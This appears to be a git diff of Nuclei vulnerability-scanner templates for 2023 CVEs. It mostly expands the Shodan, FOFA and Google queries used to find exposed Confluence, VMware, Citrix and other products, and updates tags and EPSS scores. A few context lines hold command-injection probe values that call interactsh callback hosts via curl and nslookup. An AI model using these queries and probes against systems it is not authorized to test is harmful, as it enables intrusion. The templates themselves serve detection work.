+ - html:"Modoboa" + - http.favicon.hash:1949005079 + - http.html:"modoboa" + fofa-query: + - body="Modoboa" + - body="modoboa" + - icon_hash=1949005079 tags: cve2023,cve,huntr,packetstorm,modoboa,default-login http: diff --git a/http/cves/2023/CVE-2023-0947.yaml b/http/cves/2023/CVE-2023-0947.yaml index a769e1f62d..85ab8c4fd4 100644 --- a/http/cves/2023/CVE-2023-0947.yaml +++ b/http/cves/2023/CVE-2023-0947.yaml @@ -23,8 +23,12 @@ info: max-request: 2 vendor: flatpress product: flatpress - shodan-query: http.favicon.hash:-1189292869 - fofa-query: body="flatpress" + shodan-query: + - http.favicon.hash:-1189292869 + - http.html:"flatpress" + fofa-query: + - body="flatpress" + - icon_hash=-1189292869 tags: cve,cve2023,huntr,lfi,flatpress,listing http: diff --git a/http/cves/2023/CVE-2023-1177.yaml b/http/cves/2023/CVE-2023-1177.yaml index 6ba483e3de..4db58c6c19 100644 --- a/http/cves/2023/CVE-2023-1177.yaml +++ b/http/cves/2023/CVE-2023-1177.yaml @@ -30,7 +30,9 @@ info: vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" - fofa-query: title="mlflow" + fofa-query: + - title="mlflow" + - app="mlflow" google-query: intitle:"mlflow" tags: cve2023,cve,mlflow,oss,lfi,huntr,intrusive,lfprojects diff --git a/http/cves/2023/CVE-2023-1496.yaml b/http/cves/2023/CVE-2023-1496.yaml index ca70240103..0c58956481 100644 --- a/http/cves/2023/CVE-2023-1496.yaml +++ b/http/cves/2023/CVE-2023-1496.yaml @@ -25,7 +25,9 @@ info: max-request: 1 vendor: evilmartians product: imgproxy - shodan-query: "Server: imgproxy" + shodan-query: + - "Server: imgproxy" + - "server: imgproxy" tags: cve,cve2023,huntr,imgproxy,xss,svg,evilmartians http: diff --git a/http/cves/2023/CVE-2023-1671.yaml b/http/cves/2023/CVE-2023-1671.yaml index e49467e9c9..0eab7607b8 100644 --- a/http/cves/2023/CVE-2023-1671.yaml +++ b/http/cves/2023/CVE-2023-1671.yaml @@ -29,8 +29,14 @@ info: max-request: 1 vendor: sophos product: web_appliance - shodan-query: title:"Sophos Web Appliance" - fofa-query: title="Sophos Web Appliance" + shodan-query: + - title:"Sophos Web Appliance" + - http.title:"sophos web appliance" + - http.favicon.hash:-893681401 + fofa-query: + - title="Sophos Web Appliance" + - title="sophos web appliance" + - icon_hash=-893681401 google-query: intitle:"sophos web appliance" tags: cve2023,cve,packetstorm,rce,sophos,oast,kev diff --git a/http/cves/2023/CVE-2023-1698.yaml b/http/cves/2023/CVE-2023-1698.yaml index ce1af8b645..419ab84b3e 100644 --- a/http/cves/2023/CVE-2023-1698.yaml +++ b/http/cves/2023/CVE-2023-1698.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: wago product: compact_controller_100_firmware - shodan-query: html:"/wbm/" html:"wago" + shodan-query: + - html:"/wbm/" html:"wago" + - http.html:"/wbm/" html:"wago" fofa-query: body="/wbm/" html:"wago" tags: cve2023,cve,wago,rce diff --git a/http/cves/2023/CVE-2023-1719.yaml b/http/cves/2023/CVE-2023-1719.yaml index 268e7d9d18..dcc48437a5 100644 --- a/http/cves/2023/CVE-2023-1719.yaml +++ b/http/cves/2023/CVE-2023-1719.yaml @@ -23,7 +23,9 @@ info: max-request: 1 vendor: bitrix24 product: bitrix24 - shodan-query: html:"/bitrix/" + shodan-query: + - html:"/bitrix/" + - http.html:"/bitrix/" fofa-query: body="/bitrix/" tags: cve2023,cve,bitrix,xss,bitrix24 diff --git a/http/cves/2023/CVE-2023-1835.yaml b/http/cves/2023/CVE-2023-1835.yaml index c61f3dbeda..8dddac099d 100644 --- a/http/cves/2023/CVE-2023-1835.yaml +++ b/http/cves/2023/CVE-2023-1835.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-1835 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29003 + epss-score: 0.0011 + epss-percentile: 0.44066 cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1892.yaml b/http/cves/2023/CVE-2023-1892.yaml index 83b1cc6592..56a36e9398 100644 --- a/http/cves/2023/CVE-2023-1892.yaml +++ b/http/cves/2023/CVE-2023-1892.yaml @@ -23,7 +23,9 @@ info: vendor: contribsys product: sidekiq shodan-query: http.title:"sidekiq" - fofa-query: title="Sidekiq" + fofa-query: + - title="Sidekiq" + - title="sidekiq" google-query: intitle:"sidekiq" tags: cve,cve2023,sidekiq,contribsys,xss flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-20073.yaml b/http/cves/2023/CVE-2023-20073.yaml index 468f790506..a6ec59a4d1 100644 --- a/http/cves/2023/CVE-2023-20073.yaml +++ b/http/cves/2023/CVE-2023-20073.yaml @@ -29,7 +29,9 @@ info: max-request: 3 vendor: cisco product: rv340_firmware - fofa-query: app="CISCO-RV340" || app="CISCO-RV340W" || app="CISCO-RV345" || app="CISCO-RV345P" + fofa-query: + - app="CISCO-RV340" || app="CISCO-RV340W" || app="CISCO-RV345" || app="CISCO-RV345P" + - app="cisco-rv340" || app="cisco-rv340w" || app="cisco-rv345" || app="cisco-rv345p" tags: cve2023,cve,xss,fileupload,cisco,unauth,routers,vpn,intrusive variables: html_comment: "<!-- {{randstr}} -->" # Random string as HTML comment to append in response body diff --git a/http/cves/2023/CVE-2023-2059.yaml b/http/cves/2023/CVE-2023-2059.yaml index 8bf8628411..941fecda57 100644 --- a/http/cves/2023/CVE-2023-2059.yaml +++ b/http/cves/2023/CVE-2023-2059.yaml @@ -23,8 +23,13 @@ info: max-request: 1 vendor: dedecms product: dedecms - shodan-query: http.html:"dedecms" - fofa-query: app="DedeCMS" + shodan-query: + - http.html:"dedecms" + - cpe:"cpe:2.3:a:dedecms:dedecms" + fofa-query: + - app="DedeCMS" + - app="dedecms" + - body="dedecms" tags: cve,cve2023,dedecms,lfi http: diff --git a/http/cves/2023/CVE-2023-20864.yaml b/http/cves/2023/CVE-2023-20864.yaml index e9557df7b7..20000ecb37 100644 --- a/http/cves/2023/CVE-2023-20864.yaml +++ b/http/cves/2023/CVE-2023-20864.yaml @@ -27,7 +27,9 @@ info: max-request: 2 vendor: vmware product: aria_operations_for_logs - shodan-query: title:"vRealize Log Insight" + shodan-query: + - title:"vRealize Log Insight" + - http.title:"vrealize log insight" fofa-query: title="vrealize log insight" google-query: intitle:"vrealize log insight" tags: cve2023,cve,vmware,aria,rce,oast diff --git a/http/cves/2023/CVE-2023-20887.yaml b/http/cves/2023/CVE-2023-20887.yaml index 7821e0fcf0..5f0a0b6967 100644 --- a/http/cves/2023/CVE-2023-20887.yaml +++ b/http/cves/2023/CVE-2023-20887.yaml @@ -30,9 +30,17 @@ info: max-request: 1 vendor: vmware product: vrealize_network_insight - shodan-query: title:"VMware vRealize Network Insight" - fofa-query: title="VMware vRealize Network Insight" - google-query: intitle:"vmware aria operations" + shodan-query: + - title:"VMware vRealize Network Insight" + - http.title:"vmware vrealize network insight" + - http.title:"vmware aria operations" + fofa-query: + - title="VMware vRealize Network Insight" + - title="vmware aria operations" + - title="vmware vrealize network insight" + google-query: + - intitle:"vmware aria operations" + - intitle:"vmware vrealize network insight" tags: cve2023,cve,packetstorm,vmware,rce,msf,vrealize,insight,oast,kev variables: cmd: "curl {{interactsh-url}}" diff --git a/http/cves/2023/CVE-2023-20888.yaml b/http/cves/2023/CVE-2023-20888.yaml index de873a4c1c..ae1166a8b4 100644 --- a/http/cves/2023/CVE-2023-20888.yaml +++ b/http/cves/2023/CVE-2023-20888.yaml @@ -26,9 +26,16 @@ info: max-request: 2 vendor: vmware product: vrealize_network_insight - shodan-query: title:"VMware Aria Operations" - fofa-query: title="vmware vrealize network insight" - google-query: intitle:"vmware aria operations" + shodan-query: + - title:"VMware Aria Operations" + - http.title:"vmware vrealize network insight" + - http.title:"vmware aria operations" + fofa-query: + - title="vmware vrealize network insight" + - title="vmware aria operations" + google-query: + - intitle:"vmware aria operations" + - intitle:"vmware vrealize network insight" tags: cve2023,cve,vmware,aria,rce,authenticated,oast http: diff --git a/http/cves/2023/CVE-2023-20889.yaml b/http/cves/2023/CVE-2023-20889.yaml index 26c0802963..598dd8dc5f 100644 --- a/http/cves/2023/CVE-2023-20889.yaml +++ b/http/cves/2023/CVE-2023-20889.yaml @@ -27,9 +27,16 @@ info: max-request: 2 vendor: vmware product: vrealize_network_insight - shodan-query: title:"VMware Aria Operations" - fofa-query: title="vmware vrealize network insight" - google-query: intitle:"vmware aria operations" + shodan-query: + - title:"VMware Aria Operations" + - http.title:"vmware vrealize network insight" + - http.title:"vmware aria operations" + fofa-query: + - title="vmware vrealize network insight" + - title="vmware aria operations" + google-query: + - intitle:"vmware aria operations" + - intitle:"vmware vrealize network insight" tags: cve2023,cve,vmware,aria,disclosure,authenticated,rce,oast,intrusive variables: payload: location='http://{{interactsh-url}}' diff --git a/http/cves/2023/CVE-2023-22232.yaml b/http/cves/2023/CVE-2023-22232.yaml index 701aa352e2..edc17ca988 100644 --- a/http/cves/2023/CVE-2023-22232.yaml +++ b/http/cves/2023/CVE-2023-22232.yaml @@ -24,7 +24,9 @@ info: max-request: 1 vendor: adobe product: connect - shodan-query: title:"Adobe Connect" + shodan-query: + - title:"Adobe Connect" + - http.title:"openvpn connect" fofa-query: title="openvpn connect" google-query: intitle:"openvpn connect" tags: packetstorm,cve2023,cve,adobe,lfd,download diff --git a/http/cves/2023/CVE-2023-2227.yaml b/http/cves/2023/CVE-2023-2227.yaml index b626b9186c..1df233b19f 100644 --- a/http/cves/2023/CVE-2023-2227.yaml +++ b/http/cves/2023/CVE-2023-2227.yaml @@ -19,10 +19,16 @@ info: epss-percentile: 0.85804 cpe: cpe:2.3:a:modoboa:modoboa:*:*:*:*:*:*:*:* metadata: + max-request: 1 vendor: modoboa product: modoboa - shodan-query: http.favicon.hash:1949005079 - fofa-query: body="Modoboa" + shodan-query: + - "http.favicon.hash:1949005079" + - http.html:"modoboa" + fofa-query: + - "body=\"Modoboa\"" + - body="modoboa" + - icon_hash=1949005079 tags: cve,cve2023,modoboa,exposure,disclosure http: diff --git a/http/cves/2023/CVE-2023-22463.yaml b/http/cves/2023/CVE-2023-22463.yaml index f677a152bf..1cdad88f18 100644 --- a/http/cves/2023/CVE-2023-22463.yaml +++ b/http/cves/2023/CVE-2023-22463.yaml @@ -28,8 +28,12 @@ info: max-request: 1 vendor: fit2cloud product: kubepi - shodan-query: html:"kubepi" - fofa-query: "kubepi" + shodan-query: + - html:"kubepi" + - http.html:"kubepi" + fofa-query: + - "kubepi" + - body="kubepi" tags: cve,cve2023,kubepi,k8s,auth-bypass,fit2cloud variables: name: "{{rand_base(6)}}" diff --git a/http/cves/2023/CVE-2023-22478.yaml b/http/cves/2023/CVE-2023-22478.yaml index 24be618612..9167352c27 100644 --- a/http/cves/2023/CVE-2023-22478.yaml +++ b/http/cves/2023/CVE-2023-22478.yaml @@ -29,8 +29,12 @@ info: max-request: 1 vendor: fit2cloud product: kubepi - shodan-query: html:"kubepi" - fofa-query: "kubepi" + shodan-query: + - html:"kubepi" + - http.html:"kubepi" + fofa-query: + - "kubepi" + - body="kubepi" tags: cve2023,cve,kubepi,k8s,exposure,fit2cloud http: diff --git a/http/cves/2023/CVE-2023-22480.yaml b/http/cves/2023/CVE-2023-22480.yaml index 0f00ff096a..48e7e63787 100644 --- a/http/cves/2023/CVE-2023-22480.yaml +++ b/http/cves/2023/CVE-2023-22480.yaml @@ -29,8 +29,13 @@ info: max-request: 1 vendor: fit2cloud product: kubeoperator - shodan-query: html:"KubeOperator" - fofa-query: app="KubeOperator" + shodan-query: + - html:"KubeOperator" + - http.html:"kubeoperator" + fofa-query: + - app="KubeOperator" + - body="kubeoperator" + - app="kubeoperator" tags: cve2023,cve,kubeoperator,k8s,kubeconfig,exposure,fit2cloud http: diff --git a/http/cves/2023/CVE-2023-22515.yaml b/http/cves/2023/CVE-2023-22515.yaml index bb491ff74f..caee265680 100644 --- a/http/cves/2023/CVE-2023-22515.yaml +++ b/http/cves/2023/CVE-2023-22515.yaml @@ -27,7 +27,9 @@ info: vendor: atlassian product: confluence_data_center shodan-query: http.component:"atlassian confluence" - fofa-query: app="ATLASSIAN-Confluence" + fofa-query: + - app="ATLASSIAN-Confluence" + - app="atlassian-confluence" tags: cve2023,cve,confluence,auth-bypass,kev,intrusive,atlassian variables: username: "{{rand_base(10)}}" diff --git a/http/cves/2023/CVE-2023-22518.yaml b/http/cves/2023/CVE-2023-22518.yaml index 077317adf8..d94e80ae1e 100644 --- a/http/cves/2023/CVE-2023-22518.yaml +++ b/http/cves/2023/CVE-2023-22518.yaml @@ -26,7 +26,9 @@ info: max-request: 1 vendor: atlassian product: confluence_data_center - shodan-query: http.component:"Atlassian Confluence" + shodan-query: + - http.component:"Atlassian Confluence" + - http.component:"atlassian confluence" fofa-query: app="atlassian-confluence" note: this template attempts to validate the vulnerability by uploading an invalid (empty) zip file. This is a safe method for checking vulnerability and will not cause data loss or database reset. In real attack scenarios, a malicious file could potentially be used causing more severe impacts. tags: cve,cve2023,atlassian,confluence,rce,unauth,intrusive,kev diff --git a/http/cves/2023/CVE-2023-2252.yaml b/http/cves/2023/CVE-2023-2252.yaml index bb6c9943ea..29498da1ba 100644 --- a/http/cves/2023/CVE-2023-2252.yaml +++ b/http/cves/2023/CVE-2023-2252.yaml @@ -27,7 +27,7 @@ info: vendor: wpwax product: directorist framework: wordpress - tags: cve2023,cve,wpscan,lfi,directorist,wordpress,wp-plugin,wp,authenticated + tags: cve2023,cve,wpscan,lfi,directorist,wordpress,wp-plugin,wp,authenticated,wpwax http: - raw: diff --git a/http/cves/2023/CVE-2023-22527.yaml b/http/cves/2023/CVE-2023-22527.yaml index 8ccbc1aa8a..70ac355b82 100644 --- a/http/cves/2023/CVE-2023-22527.yaml +++ b/http/cves/2023/CVE-2023-22527.yaml @@ -25,9 +25,11 @@ info: max-request: 1 vendor: atlassian product: confluence_data_center - shodan-query: http.component:"Atlassian Confluence" + shodan-query: + - http.component:"Atlassian Confluence" + - http.component:"atlassian confluence" fofa-query: app="atlassian-confluence" - tags: packetstorm,cve,cve2023,confluence,rce,ssti,kev + tags: packetstorm,cve,cve2023,confluence,rce,ssti,kev,atlassian http: - raw: diff --git a/http/cves/2023/CVE-2023-22620.yaml b/http/cves/2023/CVE-2023-22620.yaml index d8131fbb09..7f35da627f 100644 --- a/http/cves/2023/CVE-2023-22620.yaml +++ b/http/cves/2023/CVE-2023-22620.yaml @@ -28,7 +28,9 @@ info: max-request: 2 vendor: securepoint product: unified_threat_management - shodan-query: title:"Securepoint UTM" + shodan-query: + - title:"Securepoint UTM" + - http.title:"securepoint utm" fofa-query: title="securepoint utm" google-query: intitle:"securepoint utm" tags: cve,cve2023,utm,leak,memory,packetstorm,securepoint diff --git a/http/cves/2023/CVE-2023-22897.yaml b/http/cves/2023/CVE-2023-22897.yaml index f8a9a46def..68a638d125 100644 --- a/http/cves/2023/CVE-2023-22897.yaml +++ b/http/cves/2023/CVE-2023-22897.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: securepoint product: unified_threat_management - shodan-query: title:"Securepoint UTM" + shodan-query: + - title:"Securepoint UTM" + - http.title:"securepoint utm" fofa-query: title="securepoint utm" google-query: intitle:"securepoint utm" tags: cve,cve2023,securepoint,utm,exposure,memory diff --git a/http/cves/2023/CVE-2023-23161.yaml b/http/cves/2023/CVE-2023-23161.yaml index 96e550d512..1d49f2caee 100644 --- a/http/cves/2023/CVE-2023-23161.yaml +++ b/http/cves/2023/CVE-2023-23161.yaml @@ -29,8 +29,10 @@ info: max-request: 1 vendor: phpgurukul product: art_gallery_management_system - fofa-query: title="Art Gallery Management System" - tags: cve2023,cve,packetstorm,art,gallery,xss,art_gallery_management_system_project + fofa-query: + - title="Art Gallery Management System" + - title="art gallery management system" + tags: cve2023,cve,packetstorm,art,gallery,xss,art_gallery_management_system_project,phpgurukul http: - method: GET diff --git a/http/cves/2023/CVE-2023-23333.yaml b/http/cves/2023/CVE-2023-23333.yaml index f02c6d26df..0aa91d64dd 100644 --- a/http/cves/2023/CVE-2023-23333.yaml +++ b/http/cves/2023/CVE-2023-23333.yaml @@ -29,8 +29,16 @@ info: max-request: 1 vendor: contec product: solarview_compact_firmware - shodan-query: http.html:"SolarView Compact" - fofa-query: body="SolarView Compact" && title="Top" + shodan-query: + - http.html:"SolarView Compact" + - http.favicon.hash:"-244067125" + - http.html:"solarview compact" + - cpe:"cpe:2.3:o:contec:solarview_compact_firmware" + fofa-query: + - body="SolarView Compact" && title="Top" + - body="solarview compact" && title="top" + - icon_hash="-244067125" + - body="solarview compact" tags: cve,cve2023,packetstorm,solarview,rce,contec variables: cmd: "echo+CVE-2023-23333|rev" diff --git a/http/cves/2023/CVE-2023-2356.yaml b/http/cves/2023/CVE-2023-2356.yaml index 82fb7bb236..cd717fa4b3 100644 --- a/http/cves/2023/CVE-2023-2356.yaml +++ b/http/cves/2023/CVE-2023-2356.yaml @@ -30,7 +30,10 @@ info: vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" - fofa-query: app="MLflow" + fofa-query: + - app="MLflow" + - app="mlflow" + - title="mlflow" google-query: intitle:"mlflow" tags: cve2023,cve,lfi,huntr,mlflow,oss,intrusive,lfprojects variables: diff --git a/http/cves/2023/CVE-2023-23752.yaml b/http/cves/2023/CVE-2023-23752.yaml index 101c556043..2e8636f622 100644 --- a/http/cves/2023/CVE-2023-23752.yaml +++ b/http/cves/2023/CVE-2023-23752.yaml @@ -27,7 +27,11 @@ info: max-request: 2 vendor: joomla product: joomla\! - shodan-query: html:"Joomla! - Open Source Content Management" + shodan-query: + - html:"Joomla! - Open Source Content Management" + - http.html:"joomla! - open source content management" + - http.component:"joomla" + - cpe:"cpe:2.3:a:joomla:joomla\!" fofa-query: body="joomla! - open source content management" tags: cve,cve2023,joomla,kev diff --git a/http/cves/2023/CVE-2023-24044.yaml b/http/cves/2023/CVE-2023-24044.yaml index 9da9704b3e..fd454bc548 100644 --- a/http/cves/2023/CVE-2023-24044.yaml +++ b/http/cves/2023/CVE-2023-24044.yaml @@ -29,8 +29,14 @@ info: max-request: 1 vendor: plesk product: obsidian - shodan-query: title:"Plesk Obsidian" - fofa-query: title="Plesk Obsidian" + shodan-query: + - title:"Plesk Obsidian" + - http.html:"plesk obsidian" + - http.title:"plesk obsidian" + fofa-query: + - title="Plesk Obsidian" + - body="plesk obsidian" + - title="plesk obsidian" google-query: intitle:"plesk obsidian" tags: cve2023,cve,header,injection,plesk,obsidian diff --git a/http/cves/2023/CVE-2023-24243.yaml b/http/cves/2023/CVE-2023-24243.yaml index 852978493c..2c8467b66c 100644 --- a/http/cves/2023/CVE-2023-24243.yaml +++ b/http/cves/2023/CVE-2023-24243.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: cdata product: arc - shodan-query: http.favicon.hash:163538942 + shodan-query: + - http.favicon.hash:163538942 + - http.favicon.hash:"163538942" fofa-query: icon_hash="163538942" tags: cve,cve2023,cdata,rsb,ssrf diff --git a/http/cves/2023/CVE-2023-24322.yaml b/http/cves/2023/CVE-2023-24322.yaml index 127abc79a2..4bea2f2635 100644 --- a/http/cves/2023/CVE-2023-24322.yaml +++ b/http/cves/2023/CVE-2023-24322.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: mojoportal product: mojoportal - shodan-query: html:"mojoPortal" + shodan-query: + - html:"mojoPortal" + - http.html:"mojoportal" fofa-query: body="mojoportal" tags: cve,cve2023,cves,mojoportal,xss diff --git a/http/cves/2023/CVE-2023-24488.yaml b/http/cves/2023/CVE-2023-24488.yaml index 60fe87763f..64dc1d1902 100644 --- a/http/cves/2023/CVE-2023-24488.yaml +++ b/http/cves/2023/CVE-2023-24488.yaml @@ -28,7 +28,9 @@ info: max-request: 2 vendor: citrix product: gateway - shodan-query: title:"Citrix Gateway" + shodan-query: + - title:"Citrix Gateway" + - http.title:"citrix gateway" fofa-query: title="citrix gateway" google-query: intitle:"citrix gateway" tags: cve2023,cve,citrix,xss,adc diff --git a/http/cves/2023/CVE-2023-24489.yaml b/http/cves/2023/CVE-2023-24489.yaml index bed765c579..ea7445affa 100644 --- a/http/cves/2023/CVE-2023-24489.yaml +++ b/http/cves/2023/CVE-2023-24489.yaml @@ -29,7 +29,9 @@ info: max-request: 256 vendor: citrix product: sharefile_storage_zones_controller - shodan-query: title:"ShareFile Storage Server" + shodan-query: + - title:"ShareFile Storage Server" + - http.title:"sharefile storage server" fofa-query: title="sharefile storage server" google-query: intitle:"sharefile storage server" tags: cve2023,cve,sharefile,rce,intrusive,fileupload,fuzz,kev,citrix diff --git a/http/cves/2023/CVE-2023-24657.yaml b/http/cves/2023/CVE-2023-24657.yaml index 47806dddca..ad7ebe250d 100644 --- a/http/cves/2023/CVE-2023-24657.yaml +++ b/http/cves/2023/CVE-2023-24657.yaml @@ -26,7 +26,9 @@ info: max-request: 2 vendor: phpipam product: phpipam - shodan-query: html:"phpIPAM IP address management" + shodan-query: + - html:"phpIPAM IP address management" + - http.html:"phpipam ip address management" fofa-query: body="phpipam ip address management" tags: cve2023,cve,xss,phpipam,authenticated diff --git a/http/cves/2023/CVE-2023-24733.yaml b/http/cves/2023/CVE-2023-24733.yaml index 40d7f5e4a8..8d8419855b 100644 --- a/http/cves/2023/CVE-2023-24733.yaml +++ b/http/cves/2023/CVE-2023-24733.yaml @@ -27,9 +27,13 @@ info: max-request: 1 vendor: sigb product: pmb - shodan-query: http.favicon.hash:1469328760 - fofa-query: body="pmb group" - tags: cve,cve2023,unauth,xss,pmb,pmb_project + shodan-query: + - http.favicon.hash:1469328760 + - http.html:"pmb group" + fofa-query: + - body="pmb group" + - icon_hash=1469328760 + tags: cve,cve2023,unauth,xss,pmb,pmb_project,sigb http: - method: GET diff --git a/http/cves/2023/CVE-2023-24735.yaml b/http/cves/2023/CVE-2023-24735.yaml index 384df1bd0e..4c4ad81018 100644 --- a/http/cves/2023/CVE-2023-24735.yaml +++ b/http/cves/2023/CVE-2023-24735.yaml @@ -27,9 +27,13 @@ info: max-request: 1 vendor: sigb product: pmb - shodan-query: http.favicon.hash:1469328760 - fofa-query: body="pmb group" - tags: cve2023,cve,redirect,pmb,pmb_project + shodan-query: + - http.favicon.hash:1469328760 + - http.html:"pmb group" + fofa-query: + - body="pmb group" + - icon_hash=1469328760 + tags: cve2023,cve,redirect,pmb,pmb_project,sigb http: - method: GET diff --git a/http/cves/2023/CVE-2023-24737.yaml b/http/cves/2023/CVE-2023-24737.yaml index 84c8146af2..359e6321da 100644 --- a/http/cves/2023/CVE-2023-24737.yaml +++ b/http/cves/2023/CVE-2023-24737.yaml @@ -27,9 +27,13 @@ info: max-request: 1 vendor: sigb product: pmb - shodan-query: http.favicon.hash:1469328760 - fofa-query: body="pmb group" - tags: cve2023,cve,xss,pmb,pmb_project + shodan-query: + - http.favicon.hash:1469328760 + - http.html:"pmb group" + fofa-query: + - body="pmb group" + - icon_hash=1469328760 + tags: cve2023,cve,xss,pmb,pmb_project,sigb http: - raw: diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml index 98bb1ce4c9..619d9328d1 100644 --- a/http/cves/2023/CVE-2023-25135.yaml +++ b/http/cves/2023/CVE-2023-25135.yaml @@ -28,9 +28,19 @@ info: max-request: 1 vendor: vbulletin product: vbulletin - shodan-query: http.component:"vBulletin" - fofa-query: body="powered by vbulletin" - google-query: intext:"Powered By vBulletin" + shodan-query: + - http.component:"vBulletin" + - http.html:"powered by vbulletin" + - http.component:"vbulletin" + - http.title:"powered by vbulletin" + - cpe:"cpe:2.3:a:vbulletin:vbulletin" + fofa-query: + - body="powered by vbulletin" + - title="powered by vbulletin" + google-query: + - intext:"Powered By vBulletin" + - intitle:"powered by vbulletin" + - intext:"powered by vbulletin" tags: cve,cve2023,vbulletin,rce http: diff --git a/http/cves/2023/CVE-2023-25157.yaml b/http/cves/2023/CVE-2023-25157.yaml index d01133cc94..21eea96cbe 100644 --- a/http/cves/2023/CVE-2023-25157.yaml +++ b/http/cves/2023/CVE-2023-25157.yaml @@ -29,8 +29,12 @@ info: max-request: 3 vendor: osgeo product: geoserver - shodan-query: title:"geoserver" - fofa-query: title="geoserver" + shodan-query: + - title:"geoserver" + - http.title:"geoserver" + fofa-query: + - title="geoserver" + - app="geoserver" google-query: intitle:"geoserver" tags: cve2023,cve,geoserver,ogc,sqli,intrusive,osgeo diff --git a/http/cves/2023/CVE-2023-25194.yaml b/http/cves/2023/CVE-2023-25194.yaml index c9c2edc4e8..f0a2d25405 100644 --- a/http/cves/2023/CVE-2023-25194.yaml +++ b/http/cves/2023/CVE-2023-25194.yaml @@ -25,7 +25,9 @@ info: max-request: 1 vendor: apache product: kafka_connect - shodan-query: html:"Apache Druid" + shodan-query: + - html:"Apache Druid" + - http.html:"apache druid" fofa-query: body="apache druid" tags: packetstorm,cve,cve2023,apache,druid,kafka,rce,jndi,oast diff --git a/http/cves/2023/CVE-2023-25573.yaml b/http/cves/2023/CVE-2023-25573.yaml index 3628b7d142..50ba96d38f 100644 --- a/http/cves/2023/CVE-2023-25573.yaml +++ b/http/cves/2023/CVE-2023-25573.yaml @@ -29,7 +29,10 @@ info: vendor: metersphere product: metersphere shodan-query: http.html:"metersphere" - fofa-query: body="Metersphere" + fofa-query: + - body="Metersphere" + - body="metersphere" + - title="metersphere" tags: cve,cve2023,metersphere,lfi variables: str: "{{rand_base(4)}}" diff --git a/http/cves/2023/CVE-2023-25717.yaml b/http/cves/2023/CVE-2023-25717.yaml index dedfb5267c..0e48695ae9 100644 --- a/http/cves/2023/CVE-2023-25717.yaml +++ b/http/cves/2023/CVE-2023-25717.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: ruckuswireless product: ruckus_wireless_admin - shodan-query: title:"ruckus wireless" + shodan-query: + - title:"ruckus wireless" + - http.title:"ruckus wireless" fofa-query: title="ruckus wireless" google-query: intitle:"ruckus wireless" tags: cve2023,cve,ruckus,rce,kev,ruckuswireless diff --git a/http/cves/2023/CVE-2023-26035.yaml b/http/cves/2023/CVE-2023-26035.yaml index 952b598ee5..d5daf86b2a 100644 --- a/http/cves/2023/CVE-2023-26035.yaml +++ b/http/cves/2023/CVE-2023-26035.yaml @@ -26,7 +26,9 @@ info: max-request: 2 vendor: zoneminder product: zoneminder - shodan-query: html:"ZM - Login" + shodan-query: + - html:"ZM - Login" + - http.html:"zm - login" fofa-query: body="zm - login" tags: cve,cve2023,rce,zoneminder,unauth,packetstorm flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-26067.yaml b/http/cves/2023/CVE-2023-26067.yaml index 21b9d3339d..b19e11dbdd 100644 --- a/http/cves/2023/CVE-2023-26067.yaml +++ b/http/cves/2023/CVE-2023-26067.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: lexmark product: cxtpc_firmware - shodan-query: "Server: Lexmark_Web_Server" + shodan-query: + - "Server: Lexmark_Web_Server" + - "server: lexmark_web_server" tags: cve2023,cve,printer,iot,lexmark variables: cmd: 'nslookup {{interactsh-url}}' diff --git a/http/cves/2023/CVE-2023-26255.yaml b/http/cves/2023/CVE-2023-26255.yaml index 9fe41a81d3..df55ab250b 100644 --- a/http/cves/2023/CVE-2023-26255.yaml +++ b/http/cves/2023/CVE-2023-26255.yaml @@ -29,7 +29,9 @@ info: vendor: stagil product: stagil_navigation framework: jira - shodan-query: title:Jira + shodan-query: + - title:Jira + - http.title:jira fofa-query: title=jira google-query: intitle:jira tags: cve2023,cve,lfi,jira,cms,atlassian,stagil diff --git a/http/cves/2023/CVE-2023-26256.yaml b/http/cves/2023/CVE-2023-26256.yaml index 4b3b04e8b6..622f061d87 100644 --- a/http/cves/2023/CVE-2023-26256.yaml +++ b/http/cves/2023/CVE-2023-26256.yaml @@ -29,7 +29,9 @@ info: vendor: stagil product: stagil_navigation framework: jira - shodan-query: title:Jira + shodan-query: + - title:Jira + - http.title:jira fofa-query: title=jira google-query: intitle:jira tags: cve,cve2023,lfi,jira,cms,atlassian,stagil diff --git a/http/cves/2023/CVE-2023-26347.yaml b/http/cves/2023/CVE-2023-26347.yaml index e67b747c7f..e930909f0d 100644 --- a/http/cves/2023/CVE-2023-26347.yaml +++ b/http/cves/2023/CVE-2023-26347.yaml @@ -24,8 +24,15 @@ info: max-request: 1 vendor: adobe product: coldfusion - shodan-query: http.component:"Adobe ColdFusion" - fofa-query: app="Adobe-ColdFusion" + shodan-query: + - http.component:"Adobe ColdFusion" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - app="Adobe-ColdFusion" + - app="adobe-coldfusion" + - title="coldfusion administrator login" google-query: intitle:"coldfusion administrator login" tags: cve2023,cve,adobe,coldfusion,auth-bypass diff --git a/http/cves/2023/CVE-2023-26360.yaml b/http/cves/2023/CVE-2023-26360.yaml index afbeaa7449..c9ec533f79 100644 --- a/http/cves/2023/CVE-2023-26360.yaml +++ b/http/cves/2023/CVE-2023-26360.yaml @@ -21,16 +21,22 @@ info: cvss-score: 8.6 cve-id: CVE-2023-26360 cwe-id: CWE-284 - epss-score: 0.94391 - epss-percentile: 0.99045 + epss-score: 0.96298 + epss-percentile: 0.99537 cpe: cpe:2.3:a:adobe:coldfusion:2018:-:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: adobe product: coldfusion - shodan-query: http.component:"Adobe ColdFusion" - fofa-query: title="coldfusion administrator login" + shodan-query: + - http.component:"Adobe ColdFusion" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" 